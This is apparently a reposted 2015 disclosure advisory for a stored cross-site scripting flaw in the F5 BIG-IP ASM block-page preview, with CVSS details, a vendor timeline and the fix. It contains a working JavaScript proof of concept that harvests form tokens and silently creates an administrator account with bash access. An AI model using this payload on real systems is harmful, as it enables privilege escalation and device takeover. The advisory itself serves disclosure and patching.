F5 BIG-IP Application Security Manager (ASM) XSS

2015-01-14 / 2015-04-12
Credit: Peter Lapp
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Edit: Corrected the date in the timeline from 01/12/14 to 01/12/15. Details ======= Product: F5 BIG-IP Application Security Manager (ASM) Vulnerability: Cross Site Scripting Author: Peter Lapp, lappsec@gmail.com CVE: None assigned Vulnerable Versions: Confirmed 11.4.0, 11.4.1. Likely 11.4.x-11.5.x. Fixed Version: 11.6 Summary ======= The F5 ASM is a web application firewall designed to protect web applications from attacks. It allows for a custom HTML page to be displayed to end users when they trigger a violation. The configuration page for the custom response contains a text input for HTML and a "Show" button that allows the editor to preview the page. This functionality is vulnerable to Cross Site Scripting. Technical Details and POC ========================= The HTML entered into the "Response Body" area is not sandboxed, which allows a malicious user to include JavaScript that would run in the context of the management console whenever a user clicks the "Show" button. The user could use XHR to bypass CSRF protections and perform commands on behalf of anyone that clicks the "Show" button. Scenario: 1. A restricted user (Application Security Editor role) logs into the management console of the ASM, enters Javascript to add a new user (see below) into the "Response Body" input, and saves the page. 2. An admin logs on and previews the block page via the "Show" button. 3. The JS runs in the background, executes the XHR, and adds a new admin user. The restricted user now has an admin account. POC (Sloppy, I know): <script> var xmlhttp = new XMLHttpRequest(); xmlhttp.onreadystatechange= function() { if (xmlhttp.readyState==4) { var postrequest = new XMLHttpRequest(); xmlForm = xmlhttp.responseXML.getElementById('myform'); var timenowvalue = encodeURIComponent(xmlForm.elements['_timenow'].value); var timebeforevalue = encodeURIComponent(xmlForm.elements['_timenow_before'].value); var bufvalue = encodeURIComponent(xmlForm.elements['_bufvalue'].value); var bufvaluebefore = encodeURIComponent(xmlForm.elements['_bufvalue_before'].value); var parameters = "_timenow="+timenowvalue+"&_timenow_before="+timebeforevalue+"&_bufvalue="+bufvalue+"&_bufvalue_before="+bufvaluebefore+"&_form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Fuser%2Fcreate&handler_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate&showObjList=shell_with_bash&showObjList_before=&hideObjList=partition_row%2Cshell_no_bash&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Fuser%2Fcreate&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate&linked_add_id=&linked_add_id_before=&exit_page=%2Ftmui%2Fsystem%2Fuser%2Flist.jsp&exit_page_before=%2Ftmui%2Fsystem%2Fuser%2Flist.jsp&user_role_before=900&user_role_before_before=900&form_page=%2Ftmui%2Fsystem%2Fuser%2Fcreate.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate.jsp%3F&name=testadmin&name_before=&name_validation=NO_VALIDATION&name_required=1&passwd=testing123&passw d_before=&passwd_validation=com.f5.form.PasswordValidator&passwd_validationparam1=passwd_confirm&passwd_required=1&passwd_confirm=testing123&passwd_confirm_before=&passwd_confirm_validation=NO_VALIDATION&passwd_confirm_required=1&user_role=0&user_role_before=900&shell_with_bash=bash&shell_with_bash_before=disable&exit_button_before=Cancel&repeat_before=Repeat&finished=Finished&finished_before=Finished"; postrequest.open("POST", "/tmui/Control/form", true) postrequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded") postrequest.send(parameters) } } xmlhttp.open("GET", "/tmui/Control/jspmap/tmui/system/user/create.jsp", true); xmlhttp.responseType = "document"; xmlhttp.send(); </script> Solution ======== Upgrade to 11.6. The vendor indicated the patch would not be backported to previous versions. Timeline ======== 06/09/14 - Reported issue to vendor 06/18/14 - Vendor confirms the vulnerability 07/18/14 - Vendor confirms the fix will be included in 11.6 and an SOL would be created for the vulnerability 10/24/14 - Vendor confirms the fix was included in 11.6.0 but an SOL was not created and the fix would not be backported. 01/12/15 - Released vulnerability info.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top